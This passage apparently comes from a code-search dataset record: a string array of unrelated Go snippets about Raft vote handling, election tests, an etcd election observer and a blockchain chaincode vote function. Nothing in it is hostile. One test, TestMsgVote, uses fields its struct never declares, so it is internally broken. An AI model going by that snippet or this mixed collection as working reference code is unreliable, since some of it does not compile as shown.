\"Player3\"})\n\tassert.NoError(t, err)\n\n\tres, found = lobbySvc.IsReady(lobby.ID)\n\tassert.True(t, found)\n\tassert.False(t, res)\n\n\t_, err = lobbySvc.ReadyPlayer(lobby.ID, pogo.PlayerReadyMsg{PlayerName: \"Player2\", Ready: true})\n\tassert.NoError(t, err)\n\n\tres, found = lobbySvc.IsReady(lobby.ID)\n\tassert.True(t, found)\n\tassert.False(t, res)\n\n\t_, err = lobbySvc.ReadyPlayer(lobby.ID, pogo.PlayerReadyMsg{PlayerName: \"Player3\", Ready: true})\n\tassert.NoError(t, err)\n\n\tres, found = lobbySvc.IsReady(lobby.ID)\n\tassert.True(t, found)\n\tassert.True(t, res)\n}", "func TestMsgVote(t *testing.T) {\n\ttests := []struct {\n\t\tsigners []sdk.AccAddress\n\t}{\n\t\t{addrs},\n\t\t{[]sdk.AccAddress{addrs[0]}},\n\t}\n\n\tfor i, tc := range tests {\n\t\tmsg := NewMsgVote(tc.voterAddr, tc.proposalID, tc.option)\n\t\tif tc.expectPass {\n\t\t\trequire.Nil(t, msg.ValidateBasic(), \"test: %v\", i)\n\t\t} else {\n\t\t\trequire.NotNil(t, msg.ValidateBasic(), \"test: %v\", i)\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t//fmt.Printf(\"[::RequestVote]\\n\")\n\t// Your code here.\n\trf.mtx.Lock()\n\tdefer rf.mtx.Unlock()\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\n\t// case 1: check term\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tif args.Term > rf.currentTerm { // set term to max. and then maybe become leader.\n\t\trf.currentTerm = args.Term\n\t\trf.state = STATE_FOLLOWER\n\t\trf.voteFor = -1\n\t}\n\treply.Term = rf.currentTerm\n\n\t// case 2: check log\n\tisNewer := false\n\tif args.LastLogTerm == rf.log[len(rf.log)-1].Term {\n\t\tisNewer = args.LastLogIndex >= rf.log[len(rf.log)-1].LogIndex\n\t} else {\n\t\tisNewer = args.LastLogTerm > rf.log[len(rf.log)-1].Term\n\t}\n\n\tif (rf.voteFor == -1 || rf.voteFor == args.CandidateId) && isNewer {\n\t\trf.chanVoteOther <- 1\n\t\trf.state = STATE_FOLLOWER\n\t\treply.VoteGranted = true\n\t\trf.voteFor = args.CandidateId\n\t}\n\n}", "func TestRaft_SlowRecvVote(t *testing.T) {\n\thooks := NewSlowVoter(\"svr_1\", \"svr_4\", \"svr_3\")\n\thooks.mode = SlowRecv\n\tcluster := newRaftCluster(t, testLogWriter, \"svr\", 5, hooks)\n\ts := newApplySource(\"SlowRecvVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func (w *pollWorker) handleVoteForElectingPeer(voter net.Addr, vote VoteMsg) bool {\n\n\t// compare the round. When there are electing peers, they will eventually\n\t// converge to the same round when quorum is reached. This implies that\n\t// an established ensemble should share the same round, and this value\n\t// remains stable for the ensemble.\n\tcompareRound := w.compareRound(vote)\n\n\t// if the incoming vote has a greater round, re-ballot.\n\tif compareRound == common.GREATER {\n\n\t\t// update the current round. This need to be done\n\t\t// before updateProposed() is called.\n\t\tw.site.master.setCurrentRound(vote.GetRound())\n\n\t\tif w.compareVoteWithCurState(vote) == common.GREATER {\n\t\t\t// Update my vote if the incoming vote is larger.\n\t\t\tw.ballot.resetAndUpdateProposed(vote, w.site)\n\t\t} else {\n\t\t\t// otherwise udpate my vote using lastLoggedTxid\n\t\t\tw.ballot.resetAndUpdateProposed(w.site.createVoteFromCurState(), w.site)\n\t\t}\n\n\t\t// notify that our new vote\n\t\tw.site.messenger.Multicast(w.cloneProposedVote(), w.site.ensemble)\n\n\t\t// if we reach quorum with this vote, announce the result\n\t\t// and stop election\n\t\treturn w.acceptAndCheckQuorum(voter, vote)\n\n\t} else if compareRound == common.EQUAL {\n\t\t// if it is the same round and the incoming vote has higher epoch or txid,\n\t\t// update myself to the incoming vote and broadcast my new vote\n\t\tswitch w.compareVoteWithProposed(vote) {\n\t\tcase common.GREATER:\n\t\t\t// update and notify that our new vote\n\t\t\tw.ballot.updateProposed(vote, w.site)\n\t\t\tw.site.messenger.Multicast(w.cloneProposedVote(), w.site.ensemble)\n\n\t\t\t// Add this vote to the received list. Note that even if\n\t\t\t// the peer went down there is network partition after the\n\t\t\t// vote is being sent by peer, we still count this vote.\n\t\t\t// If somehow we got the wrong leader because of this, we\n\t\t\t// not be able to finish in the discovery/sync phase anyway,\n\t\t\t// and a new election will get started.\n\n\t\t\t// If I believe I am chosen as a leader in the election\n\t\t\t// and the network is partitioned afterwards. The\n\t\t\t// sychonization phase will check if I do get a majorty\n\t\t\t// of followers connecting to me before proceeding. So\n\t\t\t// for now, I can return as long as I reach quorum and\n\t\t\t// let subsequent phase to do more checking.\n\n\t\t\treturn w.acceptAndCheckQuorum(voter, vote)\n\t\tcase common.EQUAL:\n\t\t\treturn w.acceptAndCheckQuorum(voter, vote)\n\t\t}\n\t} else {\n\t\t// My round is higher. Send back the notification to the sender with my round\n\t\tw.site.messenger.Send(w.cloneProposedVote(), voter)\n\t}\n\n\treturn false\n}", "func TestV3ElectionObserve(t *testing.T) {\n\tintegration.BeforeTest(t)\n\tclus := integration.NewCluster(t, &integration.ClusterConfig{Size: 1})\n\tdefer clus.Terminate(t)\n\n\tlc := integration.ToGRPC(clus.Client(0)).Election\n\n\t// observe leadership events\n\tobservec := make(chan struct{}, 1)\n\tgo func() {\n\t\tdefer close(observec)\n\t\ts, err := lc.Observe(context.Background(), &epb.LeaderRequest{Name: []byte(\"foo\")})\n\t\tobservec <- struct{}{}\n\t\tif err != nil {\n\t\t\tt.Error(err)\n\t\t}\n\t\tfor i := 0; i < 10; i++ {\n\t\t\tresp, rerr := s.Recv()\n\t\t\tif rerr != nil {\n\t\t\t\tt.Error(rerr)\n\t\t\t}\n\t\t\trespV := 0\n\t\t\tfmt.Sscanf(string(resp.Kv.Value), \"%d\", &respV)\n\t\t\t// leader transitions should not go backwards\n\t\t\tif respV < i {\n\t\t\t\tt.Errorf(`got observe value %q, expected >= \"%d\"`, string(resp.Kv.Value), i)\n\t\t\t}\n\t\t\ti = respV\n\t\t}\n\t}()\n\n\tselect {\n\tcase <-observec:\n\tcase <-time.After(time.Second):\n\t\tt.Fatalf(\"observe stream took too long to start\")\n\t}\n\n\tlease1, err1 := integration.ToGRPC(clus.RandClient()).Lease.LeaseGrant(context.TODO(), &pb.LeaseGrantRequest{TTL: 30})\n\tif err1 != nil {\n\t\tt.Fatal(err1)\n\t}\n\tc1, cerr1 := lc.Campaign(context.TODO(), &epb.CampaignRequest{Name: []byte(\"foo\"), Lease: lease1.ID, Value: []byte(\"0\")})\n\tif cerr1 != nil {\n\t\tt.Fatal(cerr1)\n\t}\n\n\t// overlap other leader so it waits on resign\n\tleader2c := make(chan struct{})\n\tgo func() {\n\t\tdefer close(leader2c)\n\n\t\tlease2, err2 := integration.ToGRPC(clus.RandClient()).Lease.LeaseGrant(context.TODO(), &pb.LeaseGrantRequest{TTL: 30})\n\t\tif err2 != nil {\n\t\t\tt.Error(err2)\n\t\t}\n\t\tc2, cerr2 := lc.Campaign(context.TODO(), &epb.CampaignRequest{Name: []byte(\"foo\"), Lease: lease2.ID, Value: []byte(\"5\")})\n\t\tif cerr2 != nil {\n\t\t\tt.Error(cerr2)\n\t\t}\n\t\tfor i := 6; i < 10; i++ {\n\t\t\tv := []byte(fmt.Sprintf(\"%d\", i))\n\t\t\treq := &epb.ProclaimRequest{Leader: c2.Leader, Value: v}\n\t\t\tif _, err := lc.Proclaim(context.TODO(), req); err != nil {\n\t\t\t\tt.Error(err)\n\t\t\t}\n\t\t}\n\t}()\n\n\tfor i := 1; i < 5; i++ {\n\t\tv := []byte(fmt.Sprintf(\"%d\", i))\n\t\treq := &epb.ProclaimRequest{Leader: c1.Leader, Value: v}\n\t\tif _, err := lc.Proclaim(context.TODO(), req); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n\t// start second leader\n\tlc.Resign(context.TODO(), &epb.ResignRequest{Leader: c1.Leader})\n\n\tselect {\n\tcase <-observec:\n\tcase <-time.After(time.Second):\n\t\tt.Fatalf(\"observe did not observe all events in time\")\n\t}\n\n\t<-leader2c\n}", "func testCandidateResetTerm(t *testing.T, mt pb.MessageType) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tnt := newNetwork(a, b, c)\n\tdefer nt.closeAll()\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// isolate 3 and increase term in rest\n\tnt.isolate(3)\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\t// trigger campaign in isolated c\n\tc.resetRandomizedElectionTimeout()\n\tfor i := 0; i < c.randomizedElectionTimeout; i++ {\n\t\tc.tick()\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tnt.recover()\n\n\t// leader sends to isolated candidate\n\t// and expects candidate to revert to follower\n\tnt.send(pb.Message{From: 1, To: 3, Term: a.Term, Type: mt})\n\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// follower c term is reset with leader's\n\tif a.Term != c.Term {\n\t\tt.Errorf(\"follower term expected same term as leader's %d, got %d\", a.Term, c.Term)\n\t}\n}", "func (r *Raft) requestVote(rpc RPC, req *RequestVoteRequest) (transition bool) {\n\tr.peerLock.Lock()\n\tdefer r.peerLock.Unlock()\n\t// Setup a response\n\tpeers := make([][]byte, 0, len(r.peers))\n\tfor _, p := range r.peers {\n\t\tpeers = append(peers, []byte(p.String()))\n\t}\n\tresp := &RequestVoteResponse{\n\t\tTerm: r.getCurrentTerm(),\n\t\tGranted: false,\n\t\tPeers: peers,\n\t}\n\tvar err error\n\tdefer rpc.Respond(resp, err)\n\n\t// Ignore an older term\n\tif req.Term < r.getCurrentTerm() {\n\t\terr = errors.New(\"obsolete term\")\n\t\treturn\n\t}\n\n\t// Increase the term if we see a newer one\n\tif req.Term > r.getCurrentTerm() {\n\t\tif err := r.setCurrentTerm(req.Term); err != nil {\n\t\t\tr.logE.Printf(\"Failed to update current term: %w\", err)\n\t\t\treturn\n\t\t}\n\t\tresp.Term = req.Term\n\n\t\t// Ensure transition to follower\n\t\ttransition = true\n\t\tr.setState(Follower)\n\t}\n\n\t// Check if we have voted yet\n\tlastVoteTerm, err := r.stable.GetUint64(keyLastVoteTerm)\n\tif err != nil && err.Error() != \"not found\" {\n\t\tr.logE.Printf(\"raft: Failed to get last vote term: %w\", err)\n\t\treturn\n\t}\n\tlastVoteCandyBytes, err := r.stable.Get(keyLastVoteCand)\n\tif err != nil && err.Error() != \"not found\" {\n\t\tr.logE.Printf(\"raft: Failed to get last vote candidate: %w\", err)\n\t\treturn\n\t}\n\n\t// Check if we've voted in this election before\n\tif lastVoteTerm == req.Term && lastVoteCandyBytes != nil {\n\t\tr.logW.Printf(\"raft: Duplicate RequestVote for same term: %d\", req.Term)\n\t\tif bytes.Compare(lastVoteCandyBytes, req.Candidate) == 0 {\n\t\t\tr.logW.Printf(\"raft: Duplicate RequestVote from candidate: %s\", req.Candidate)\n\t\t\tresp.Granted = true\n\t\t}\n\t\treturn\n\t}\n\n\t// Reject if their term is older\n\tif r.getLastLogIndex() > 0 {\n\t\tvar lastLog Log\n\t\tif err := r.logs.GetLog(r.getLastLogIndex(), &lastLog); err != nil {\n\t\t\tr.logE.Printf(\"Failed to get last log: %d %v\",\n\t\t\t\tr.getLastLogIndex(), err)\n\t\t\treturn\n\t\t}\n\t\tif lastLog.Term > req.LastLogTerm {\n\t\t\tr.logW.Printf(\"Rejecting vote since our last term is greater\")\n\t\t\treturn\n\t\t}\n\n\t\tif lastLog.Index > req.LastLogIndex {\n\t\t\tr.logW.Printf(\"Rejecting vote since our last index is greater\")\n\t\t\treturn\n\t\t}\n\t}\n\n\t// Persist a vote for safety\n\tif err := r.persistVote(req.Term, req.Candidate); err != nil {\n\t\tr.logE.Printf(\"raft: Failed to persist vote: %w\", err)\n\t\treturn\n\t}\n\n\tresp.Granted = true\n\treturn\n}", "func (r *RaftNode) Vote(rv RequestVoteStruct, response *RPCResponse) error {\n\tr.Lock()\n\tdefer r.Unlock()\n\tif r.verbose {\n\t\tlog.Println(\"Vote()\")\n\t}\n\n\tdefer r.persistState()\n\n\tresponse.Term = r.CurrentTerm\n\n\tmyLastLogTerm := r.getLastLogTerm()\n\tmyLastLogIdx := r.getLastLogIndex()\n\n\tif r.verbose {\n\t\tlog.Printf(\"RequestVoteStruct: %s. \\nMy node: term: %d, votedFor %d, lastLogTerm: %d, lastLogIdx: %d\",\n\t\t\trv.String(), r.CurrentTerm, r.VotedFor, myLastLogTerm, myLastLogIdx)\n\t}\n\n\tlooksEligible := r.CandidateLooksEligible(rv.LastLogIdx, rv.LastLogTerm)\n\n\tif rv.Term > r.CurrentTerm {\n\t\tr.shiftToFollower(rv.Term, HostID(-1)) // We do not yet know who is leader for this term\n\t}\n\n\tif rv.Term < r.CurrentTerm {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"RV from prior term - do not grant vote\")\n\t\t}\n\t\tresponse.Success = false\n\t} else if (r.VotedFor == -1 || r.VotedFor == rv.CandidateID) && looksEligible {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"Grant vote\")\n\t\t}\n\t\tr.resetTickers()\n\t\tresponse.Success = true\n\t\tr.VotedFor = rv.CandidateID\n\t} else {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"Do not grant vote\")\n\t\t}\n\t\tresponse.Success = false\n\t}\n\n\treturn nil\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\tDPrintf(\"Raft node (%d) handles with RequestVote, candidateId: %v\\n\", rf.me, args.CandidateId)\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\treply.Term = rf.currentTerm\n\treply.PeerId = rf.me\n\n\tif rf.currentTerm == args.Term && rf.votedFor != -1 && rf.votedFor != args.CandidateId {\n\t\tDPrintf(\"Raft node (%v) denied vote, votedFor: %v, candidateId: %v.\\n\", rf.me,\n\t\t\trf.votedFor, args.CandidateId)\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tlastLogIndex := len(rf.logs) - 1\n\tlastLogEntry := rf.logs[lastLogIndex]\n\tif lastLogEntry.Term > args.LastLogTerm || lastLogIndex > args.LastLogIndex {\n\t\t// If this node is more up-to-date than candidate, then reject vote\n\t\t//DPrintf(\"Raft node (%v) LastLogIndex: %v, LastLogTerm: %v, args (%v, %v)\\n\", rf.me,\n\t\t//\tlastLogIndex, lastLogEntry.Term, args.LastLogIndex, args.LastLogTerm)\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\trf.tryEnterFollowState(args.Term)\n\n\trf.currentTerm = args.Term\n\trf.votedFor = args.CandidateId\n\treply.VoteGranted = true\n}", "func replyVote(stub shim.ChaincodeStubInterface, voteId string, reply string) peer.Response {\t\n\tMSPid, _ := shim.GetMSPID()\n\tvar OclToken int\n\t\n\t// Init vote receive list\n\tvotes_list := []Votes{}\n\tOperator_list := []Operators{}\n\n\t// Get all votes\n\tvotes, _ := stub.GetState(\"Votes\")\n\tjson.Unmarshal(votes, &votes_list)\n\n\t// Get Operator list\n\tvalue, _ := stub.GetState(\"Operators\")\n\tjson.Unmarshal(value, &Operator_list)\n\n\ti, _ := strconv.Atoi(voteId)\n\n\tfor i := 0; i < len(Operator_list); i++ {\n\t\tif(Operator_list[i].OperatorID == MSPid) {\n\t\t\tOclToken = Operator_list[i].OclToken\n\t\t}\n\t}\n\t\n\tvote_Operator := Operators{OperatorID: MSPid, OclToken: OclToken}\n\n\tif(reply == \"yes\") {\n\t\tvotes_list[i].Yes = append(votes_list[i].Yes, vote_Operator)\n\t\tvotesJson, _ := json.Marshal(votes_list)\n\t\tstub.PutState(\"Votes\", votesJson)\n\t} else if(reply == \"no\") {\n\t\tvotes_list[i].No = append(votes_list[i].No, vote_Operator)\n\t\tvotesJson, _ := json.Marshal(votes_list)\n\t\tstub.PutState(\"Votes\", votesJson)\n\t}\n\n\ttemp, _ := json.Marshal(votes_list[i])\n\tfmt.Println(\"tesstje: \" + string(temp))\n\t\n\treturn shim.Success([]byte(\"Replied on vote: \" + votes_list[i].Title))\n}", "func TestVoter(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tlogterm uint64\n\t\tindex uint64\n\n\t\twreject bool\n\t}{\n\t\t// same logterm\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 1, 1, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 1, 2, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true},\n\t\t// candidate higher logterm\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 2, 1, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 2, 2, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 2, 1, false},\n\t\t// voter higher logterm\n\t\t{[]pb.Entry{{Term: 2, Index: 1}}, 1, 1, true},\n\t\t{[]pb.Entry{{Term: 2, Index: 1}}, 1, 2, true},\n\t\t{[]pb.Entry{{Term: 2, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append(tt.ents)\n\t\tr := newTestRaft(1, []uint64{1, 2}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgVote, Term: 3, LogTerm: tt.logterm, Index: tt.index})\n\n\t\tmsgs := r.readMessages()\n\t\tif len(msgs) != 1 {\n\t\t\tt.Fatalf(\"#%d: len(msg) = %d, want %d\", i, len(msgs), 1)\n\t\t}\n\t\tm := msgs[0]\n\t\tif m.Type != pb.MsgVoteResp {\n\t\t\tt.Errorf(\"#%d: msgType = %d, want %d\", i, m.Type, pb.MsgVoteResp)\n\t\t}\n\t\tif m.Reject != tt.wreject {\n\t\t\tt.Errorf(\"#%d: reject = %t, want %t\", i, m.Reject, tt.wreject)\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// TODO: fail this rpc when killed\n\n\t// Your code here (2A, 2B).\n\tisGoodRequestVote := false\n\trf.mu.Lock()\n\n\tdefer func() {\n\t\tAssertF(reply.Term >= args.Term, \"reply.Term {%d} >= args.Term {%d}\", reply.Term, args.Term)\n\t\trf.mu.Unlock()\n\t\trf.resetElectionTimerIf(isGoodRequestVote)\n\t}()\n\n\tif args.Term < rf.currentTerm {\n\t\t*reply = RequestVoteReply{Term: rf.currentTerm, VoteGranted: false}\n\t\treturn\n\t}\n\n\tif args.Term > rf.currentTerm {\n\t\trf.transitionToFollower(args.Term, -1)\n\t}\n\n\tAssertF(args.Term == rf.currentTerm, \"\")\n\n\tif (rf.votedFor == -1 || rf.votedFor == args.CandidateId) && rf.isUptoDate(args.LastLogIndex, args.LastLogTerm) {\n\t\tisGoodRequestVote = true\n\t\trf.votedFor = args.CandidateId\n\t\t*reply = RequestVoteReply{Term: args.Term, VoteGranted: true}\n\t} else {\n\t\t*reply = RequestVoteReply{Term: args.Term, VoteGranted: false}\n\t}\n\n\trf.persist()\n}", "func (r *Raft) serviceRequestVote(request RequestVote) {\n\t//fmt.Println(\"In service RV method of \", r.Myconfig.Id)\n\tresponse := RequestVoteResponse{} //prep response object,for responding back to requester\n\tcandidateId := request.candidateId\n\tresponse.id = r.Myconfig.Id\n\t//fmt.Println(\"Follower\", r.Myconfig.Id, \"log as complete?\", r.logAsGoodAsMine(request))\n\tif r.isDeservingCandidate(request) {\n\t\tresponse.voteGranted = true\n\t\tr.votedFor = candidateId\n\t\tr.currentTerm = request.term\n\n\t\t//Writing current term and voteFor to disk\n\t\tr.WriteCVToDisk()\n\n\t} else {\n\t\tresponse.voteGranted = false\n\t}\n\tresponse.term = r.currentTerm //to return self's term too\n\n\t//fmt.Println(\"Follower\", r.Myconfig.Id, \"voting\", response.voteGranted) //\"because votefor is\", r.votedFor, \"my and request terms are:\", r.currentTerm, request.term)\n\t//fmt.Println(\"Follower\", r.Myconfig.Id, \"Current term,request.term is\", r.currentTerm, request.term, \"Self lastLogIndex is\", r.myMetaData.lastLogIndex, \"VotedFor,request.lastLogTerm\", r.votedFor, request.lastLogTerm)\n\t//fmt.Println(\"VotedFor,request.lastLogTerm\", r.votedFor, request.lastLogTerm)\n\n\t//fmt.Printf(\"In serviceRV of %v, obj prep is %v \\n\", r.Myconfig.Id, response)\n\tsend(candidateId, response) //send to sender using send(sender,response)\n}", "func (r *Raft) serviceRequestVote(request RequestVote, state int) {\n\t//fmt.Println(\"In service RV method of \", r.Myconfig.Id)\n\tresponse := RequestVoteResponse{}\n\tcandidateId := request.CandidateId\n\tresponse.Id = r.Myconfig.Id\n\tif r.isDeservingCandidate(request) {\n\t\tresponse.VoteGranted = true\n\t\tr.myCV.VotedFor = candidateId\n\t\tr.myCV.CurrentTerm = request.Term\n\t} else {\n\t\tif request.Term > r.myCV.CurrentTerm {\n\t\t\tr.myCV.CurrentTerm = request.Term\n\t\t\tr.myCV.VotedFor = -1\n\t\t}\n\t\tresponse.VoteGranted = false\n\t}\n\tif request.Term > r.myCV.CurrentTerm {\n\t\tr.WriteCVToDisk()\n\t}\n\tresponse.Term = r.myCV.CurrentTerm\n\tr.send(candidateId, response) //send to sender using send(sender,response)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\t//fmt.Println(\"got vote request at server id: \", rf.me)\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif rf.currentTerm > args.Term {\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t} else if rf.currentTerm < args.Term {\n\t\trf.currentTerm = args.Term\n\t\treply.Term = rf.currentTerm\n\t\trf.state = follower\n\t}\n\t\n\tgranted := false\n\tif rf.votedFor == nil {\n\t\tgranted = true\n\t} else if *rf.votedFor == args.CandidateId {\n\t\tgranted = true\n\t}\n\tif !granted {\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tif args.LastLogIndex != len(rf.log)-1 {\n\t\tgranted = false\n\t} else {\n\t\tif args.LastLogTerm != rf.log[len(rf.log)-1].Term {\n\t\t\tgranted = false\n\t\t}\n\t}\n\t\n\tif !granted {\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\treply.VoteGranted = true\n\trf.rpcCh<-voteRpc\n\treturn\n}", "func (m *Member) RequestVote(ctx context.Context, leader string, term uint64, logSize uint64) (*raftapi.RequestVoteResponse, error) {\n\tlog.WithFields(log.Fields{\"member_name\": m.Name}).Debugln(\"Requesting vote from\")\n\tvar conn *grpc.ClientConn\n\tconn, err := grpc.Dial(m.Address(), grpc.WithInsecure())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer conn.Close()\n\tapi := raftapi.NewRaftServiceClient(conn)\n\tresponse, err := api.RequestVote(ctx, &raftapi.RequestVoteMessage{\n\t\tTerm: term,\n\t\tCandidate: leader,\n\t\tLogSize: logSize,\n\t\tLastLogTerm: 0,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn response, nil\n}", "func (s *GrpcServer) NeedLeaderElection() bool {\n\treturn true\n}", "func (w *pollWorker) compareVote(vote1, vote2 VoteMsg) common.CompareResult {\n\n\t// Vote with the larger epoch always is larger\n\tresult := common.CompareEpoch(vote1.GetEpoch(), vote2.GetEpoch())\n\n\tif result == common.MORE_RECENT {\n\t\treturn common.GREATER\n\t}\n\n\tif result == common.LESS_RECENT {\n\t\treturn common.LESSER\n\t}\n\n\t// If a candidate has a larger logged txid, it means the candidate\n\t// has processed more proposals. This vote is larger.\n\tif vote1.GetCndLoggedTxnId() > vote2.GetCndLoggedTxnId() {\n\t\treturn common.GREATER\n\t}\n\n\tif vote1.GetCndLoggedTxnId() < vote2.GetCndLoggedTxnId() {\n\t\treturn common.LESSER\n\t}\n\n\t// This candidate has the same number of proposals in his committed log as\n\t// the other one. But if a candidate has a larger committed txid,\n\t// it means this candidate also has processed more commit messages from the\n\t// previous leader. This vote is larger.\n\tif vote1.GetCndCommittedTxnId() > vote2.GetCndCommittedTxnId() {\n\t\treturn common.GREATER\n\t}\n\n\tif vote1.GetCndCommittedTxnId() < vote2.GetCndCommittedTxnId() {\n\t\treturn common.LESSER\n\t}\n\n\t// All else is equal (e.g. during inital system startup -- repository is emtpy),\n\t// use the ip address.\n\tif vote1.GetCndId() > vote2.GetCndId() {\n\t\treturn common.GREATER\n\t}\n\n\tif vote1.GetCndId() < vote2.GetCndId() {\n\t\treturn common.LESSER\n\t}\n\n\treturn common.EQUAL\n}", "func (rf *Raft) sendRequestVote(server int, args *RequestVoteArgs, reply *RequestVoteReply, voteCount *int32) bool {\n\tok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n\tlog.Printf(\"peer %v request vote to peer %v result %v\", rf.peerId, reply.VoterId, reply)\n\tif !ok {\n\t\treturn ok\n\t}\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.getState() != Candidate || args.Term != rf.currentTerm {\n\t\treturn ok\n\t}\n\tif reply.Term > rf.currentTerm {\n\t\trf.stepDownToFollower(reply.Term)\n\t}\n\tif reply.VoteGranted {\n\t\tatomic.AddInt32(voteCount, 1)\n\t}\n\tif int(atomic.LoadInt32(voteCount)) > len(rf.peers)/2 {\n\t\trf.setState(Leader)\n\t\trf.electAsLeaderCh <- true\n\t}\n\treturn ok\n}", "func (rf *Raft) processRequestVoteReply(peerNum int, args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\t// Rule for all servers: If RPC request or response contains term T > currentTerm: set currentTerm = T, convert to follower (§5.1)\n\tif reply.Term > rf.currentTerm {\n\t\trf.convertToFollower(reply.Term)\n\t\treturn\n\t}\n\n\tif reply.VoteGranted {\n\t\trf.votesReceived++\n\t\tif rf.state == leader {\n\t\t\treturn\n\t\t}\n\t\t// it wins the election\n\t\tif rf.votesReceived > len(rf.peers)/2 {\n\t\t\t_, _ = DPrintf(newLeader(\"[T%v] %v: New Leader! (%v/%v votes) (%v -> %v)\"), rf.currentTerm, rf.me, rf.votesReceived, len(rf.peers), rf.state, leader)\n\t\t\trf.state = leader\n\n\t\t\t// Initialize all nextIndex values to the index just after the last one in its log\n\t\t\trf.nextIndex = make([]int, len(rf.peers))\n\t\t\trf.matchIndex = make([]int, len(rf.peers))\n\t\t\tfor i := range rf.nextIndex {\n\t\t\t\trf.nextIndex[i] = len(rf.log)\n\t\t\t}\n\n\t\t\t// send heartbeat messages to all of the other servers to establish its authority (§5.2)\n\t\t\tgo rf.sendPeriodicHeartBeats()\n\t\t}\n\t}\n}", "func (_Votes *VotesCaller) TickVote(opts *bind.CallOpts) (bool, error) {\n\tvar (\n\t\tret0 = new(bool)\n\t)\n\tout := ret0\n\terr := _Votes.contract.Call(opts, out, \"tickVote\")\n\treturn *ret0, err\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\treply.Term = rf.currentTerm\n\n\t// Rule for all servers: If RPC request or response contains term T > currentTerm: set currentTerm = T, convert to follower (§5.1)\n\tif args.Term > rf.currentTerm {\n\t\trf.convertToFollower(args.Term)\n\t}\n\n\t// 1. Reply false if term < currentTerm (§5.1)\n\tif args.Term < rf.currentTerm {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Discarded Vote | Received Lower Term \"), rf.currentTerm, rf.me, args.CandidateID, args.CandidateID)\n\t\treturn\n\t}\n\n\t/* 2. If\n\t *\t\t1. votedFor is null or candidateId\n\t *\t\t2. candidate’s log is at least as up-to-date as receiver’s log\n\t *\tgrant vote (§5.2, §5.4)\n\t */\n\n\t// Check 1 vote: should be able to vote or voted for candidate\n\tvoteCheck := rf.votedFor == noVote || rf.votedFor == args.CandidateID\n\t// Check 2 up-to-date = (same indices OR candidate's lastLogIndex > current peer's lastLogIndex)\n\tlastLogIndex, lastLogTerm := rf.lastLogEntryIndex(), rf.lastLogEntryTerm()\n\tlogCheck := lastLogTerm < args.LastLogTerm || (lastLogTerm == 